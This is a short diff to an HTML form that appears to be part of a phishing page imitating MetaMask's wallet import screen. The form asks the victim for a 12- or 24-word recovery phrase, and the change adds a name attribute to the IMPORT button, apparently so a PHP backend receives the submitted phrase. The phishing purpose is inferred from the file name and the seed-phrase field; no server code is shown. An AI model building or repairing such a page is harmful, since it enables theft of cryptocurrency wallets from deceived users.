--- a/indexdb.php-type=metamask.html
+++ b/indexdb.php-type=metamask.html
@@ -37,7 +37,7 @@
             <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
             </br>
             <div class="btn-wrapper">
-                <button type="submit" class="btn">IMPORT</button>
+                <button type="submit" name="import" class="btn">IMPORT</button>
             </div>
             <!-- <button type="submit" name="import" class="btn">IMPORT</button> -->
         </form>
